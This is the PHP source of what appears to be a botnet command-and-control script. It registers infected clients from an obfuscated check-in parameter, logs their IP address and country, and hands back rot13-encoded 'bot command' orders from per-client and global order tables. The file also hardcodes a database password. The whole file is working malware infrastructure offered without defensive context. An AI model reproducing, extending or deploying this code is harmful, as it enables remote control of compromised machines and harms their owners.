<?PHP// file: info.phpinclude("geoip.inc"); // for the geoip function//

1. <?PHP
2. // file: info.php
3. include("geoip.inc"); // for the geoip function
4.  
5. // database connection information
6. $database = "test";
7. $user = "test";
8. $password = "zyuZtKnnzwKejQqw";
9. $host = "localhost";
10.  
11. // custom rot13
12. function customRot13($string)
13. {
14.     for($i=0; $i < strlen($string); $i++) {
15.         $c = ord($string[$i]);
16.        
17.         if ($c >= ord('n') & $c <= ord('z') | $c >= ord('N') & $c <= ord('Z'))
18.             $c -= 13;
19.         else if ($c >= ord('a') & $c <= ord('m') | $c >= ord('A') & $c <= ord('M'))
20.             $c += 13;
21.         else if ($c >= ord('0') & $c <= ord('4'))
22.             $c += 5;
23.         else if ($c >= ord('5') & $c <= ord('9'))
24.             $c -= 5;
25.            
26.             $string[$i] = chr($c);
27.     }
28.     return $string;
29. }
30.  
31. // data sanitization
32. function sanitize($data)
33. {
34.     // remove whitespaces (not a must though)
35.     $data = trim($data);
36.  
37.     // apply stripslashes if magic_quotes_gpc is enabled
38.     if(get_magic_quotes_gpc())
39.         $data = stripslashes($data);
40.            
41.     // a mySQL connection is required before using this function
42.     $data = mysql_real_escape_string($data);
43.  
44.     return $data;
45. }
46.    
47. if( isset($_GET['sid']) ) {
48.     // connect to the database
49.     $mysql = mysql_connect( $host, $user, $password );
50.     mysql_select_db( $database );
51.        
52.     // clear buffer in this format h6Yht56RfT:WIN7:50000:m1.0:7653332
53.     //                                  $serial:$os:$delay:$version:$uptime
54.        
55.     $buffer_crypted = sanitize($_GET['sid']);
56.     $buffer_clear = customRot13($buffer_crypted);
57.        
58.     $serial = strtok($buffer_clear, ":");
59.     $os = strtok(":");
60.     $delay = strtok(":");
61.     $version = strtok(":");
62.     $uptime = strtok(":");
63.        
64.     $lastorder_id = 0;
65.     $ip = getenv("REMOTE_ADDR");
66.        
67.     // sanitize ints
68.     $delay = intval($delay);
69.     $uptime = intval($uptime);
70.     $lastorder_id = intval($lastorder_id);
71.  
72.     // format uptime
73.     $minsuptime = $uptime % 60;
74.     if ( $minsuptime > 1 ) $minsuptime = $minsuptime." Minutes";
75.     else $minsuptime = $minsuptime." Minute";
76.        
77.     $hoursuptime = $uptime / 60 % 24;
78.     if ( $hoursuptime > 1 ) $hoursuptime = $hoursuptime." Hours";
79.     else $hoursuptime = $hoursuptime." Hour";
80.        
81.     $daysuptime = $uptime / 60 / 24 % 7;
82.     if ( $daysuptime > 1 ) $daysuptime = $daysuptime." Days";
83.     else $daysuptime = $daysuptime." Day";
84.        
85.     $weeksuptime = $uptime / 60 / 24 / 7 % 52;
86.     if ( $daysuptime > 1 ) $weeksuptime = $weeksuptime." Weeks";
87.     else $weeksuptime = $weeksuptime." Week";
88.        
89.     $uptimeformated = $weeksuptime.", ".$daysuptime.", ".$hoursuptime.", ".$minsuptime;
90.  
91.     // geolocate IP
92.     $gi = geoip_open("GeoIP.dat",GEOIP_STANDARD);
93.     $country_code = geoip_country_code_by_addr($gi, $ip);
94.     $country_name = geoip_country_name_by_addr($gi, $ip);
95.     geoip_close($gi);  
96.  
97.     // populate `clients` table
98.     if( $version != NULL ) {
99.         // select our client's info
100.         $client_sql = "SELECT * FROM `clients` WHERE serial LIKE '$serial'";
101.         $client_result = mysql_query( $client_sql );
102.            
103.         // checks if the client is new
104.         if( !mysql_num_rows( $client_result ) ) {
105.             // we have a new client, insert info into the `clients` table
106.             $create_client_sql = "INSERT INTO `clients`
107.             (
108.             serial, os, ip, country_code, country_name, delay, version,
109.             uptime, lastorder_id, registered_time, report_time
110.             )
111.             VALUES
112.             (
113.             '$serial', '$os', '$ip', '$country_code', '$country_name', '$delay', '$version',
114.             '$uptimeformated', '$lastorder_id', NULL, NULL
115.             )";
116.            
117.             mysql_query( $create_client_sql ); // client added
118.         } else { // former client update information
119.             // get our client's row in the `clients` table
120.             $client_row = mysql_fetch_assoc( $client_result );
121.        
122.             // get the client's $client_id
123.             $client_id = $client_row['client_id'];
124.        
125.             // get the client's $lastorder_id
126.             $lastorder_id = $client_row['lastorder_id'];
127.        
128.             // calculate the online_uptime in secs
129.             if ( ( time() - strtotime($client_row['report_time']) ) < ( ( $client_row['delay'] / 1000 ) + 20 ) ) // if before delay expires
130.                 $online_uptime = $client_row['online_uptime'] + time() - strtotime($client_row['report_time']); // new uptime
131.             else
132.                 $online_uptime = $client_row['online_uptime']; // else welcome back here is what your uptime was!
133.            
134.             $tableinfo_sql = "SELECT create_time FROM INFORMATION_SCHEMA.TABLES WHERE table_name = clients";
135.             $tableinfo_result = mysql_query( $tableinfo_sql );
136.             $tableinfo_row = mysql_fetch_row( $tableinfo_result ); // stores `clients` table creation time
137.             $table_uptime = time() - strtotime($tableinfo_row[0]); // total uptime for the `clients` table
138.            
139.             $percent_uptime = ( 1 - ( ($table_uptime - $online_uptime) / $table_uptime ) ) * 100; // uptime in %
140.             $percent_uptime = intval($percent_uptime); // sanitize and make it an integer
141.        
142.             // uptate client information
143.             $update_sql = "UPDATE `clients` SET
144.                         report_time=NULL,
145.                         version='$version',
146.                         online_uptime='$online_uptime',
147.                         percent_uptime='$percent_uptime',
148.                         uptime='$uptimeformated',
149.                         delay='$delay',
150.                         ip='$ip',
151.                         country_code='$country_code',
152.                         country_name='$country_name',
153.                         lastorder_id='$lastorder_id'
154.                         WHERE serial LIKE '$serial'";          
155.             $update_result = mysql_query( $update_sql );
156.         } // done updating the client
157.        
158.         // check the `orders` table to see if there is a specific order for this client
159.         $orders_sql = "SELECT * FROM `orders` WHERE target_id LIKE '$client_id'";
160.         $orders_result = mysql_query( $orders_sql );
161.                
162.         // if there is a specific bot command prints it out
163.         if( mysql_num_rows( $orders_result ) ) {
164.             // echo the command to the client and clear it from the `orders` table
165.             echo ">".customRot13("init1")."<";
166.  
167.             while ( $orders_row = mysql_fetch_assoc( $orders_result ) ) {
168.                 echo ">".customRot13($orders_row['order'])."<";
169.                 $id = $orders_row['order_id'];
170.                 $delete_sql = "DELETE FROM `orders` WHERE order_id LIKE '$id'";
171.                 mysql_query( $delete_sql );
172.             } // done printing out all orders
173.         } else {
174.             // no orders were found for that client $serial in the `orders` table
175.             $all_global_sql = "SELECT * FROM `global_orders`";
176.             $all_global_orders_result = mysql_query( $all_global_sql );
177.             // check the `global_orders` table for orders
178.             if( mysql_num_rows( $all_global_orders_result ) ) {
179.                 // there are global orders
180.                 // will now check the $lastorder_id of that client
181.                 if ($lastorder_id == 0) { // never ran a global order  
182.                     // print out all the global orders it hasn't ran yet and update it's $lastorder_id
183.                     echo ">".customRot13("init2")."<";
184.                    
185.                     while ( $global_row = mysql_fetch_assoc( $all_global_orders_result ) ) {
186.                         // check if the command is expired
187.                         if ( time() < strtotime($global_row['exp_time']) ) {
188.                             echo ">".customRot13($global_row['global_order'])."<";
189.                             // clients get the global_order_id as it's $lastorder_id
190.                             $lastorder_id = $global_row['global_order_id'];
191.                             $order_update_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
192.                             mysql_query( $order_update_sql );
193.                         } else {
194.                             // command was old but gave it a shot here is your $lastorder_id
195.                             $lastorder_id = $global_row['global_order_id'];
196.                             $order_update_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
197.                             mysql_query( $order_update_sql );
198.                         } // done printing out the next global order
199.                     } // done printing out all global orders   
200.                 } else { // it already ran at least one global order as it has a $lastorder_id != 0
201.                     // check the `global_orders` table for orders
202.                     $next_sql = "SELECT * FROM `global_orders` WHERE global_order_id > '$lastorder_id' ORDER BY global_order_id";
203.                     $next_result = mysql_query( $next_sql );
204.                     // check the `global_orders` table for orders matching
205.                     if( mysql_num_rows( $next_result ) ) {
206.                         // print out all the global orders it hasn't ran yet and update it's $lastorder_id
207.                         echo ">".customRot13("init3")."<";
208.                    
209.                         while ( $next_row = mysql_fetch_assoc( $next_result ) ) {
210.                             // check if the command is expired             
211.                             if ( time() < strtotime($next_row['exp_time']) ) {
212.                                 // echo the next global order for the client
213.                                 echo ">".customRot13($next_row['global_order'])."<";
214.                                 // client gets the global_order_id as it's $lastorder_id
215.                                 $lastorder_id = $next_row['global_order_id'];
216.                                 $next_order_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
217.                                 mysql_query( $next_order_sql );
218.                             } else {
219.                                 // command was old but gave it a shot here is your $lastorder_id
220.                                 $lastorder_id = $next_row['global_order_id'];
221.                                 $next_order_sql = "UPDATE `clients` SET lastorder_id='$lastorder_id' WHERE serial LIKE '$serial'";
222.                                 mysql_query( $next_order_sql );
223.                             } // done printing out the next global order   
224.                         } // done printing out all global orders left to do
225.                     } // no new global orders
226.                 } // done checking for global orders   
227.             } // no global orders
228.         } // done checking for orders
229.     } // fake or wrong sid format
230. } // no sid
231. ?>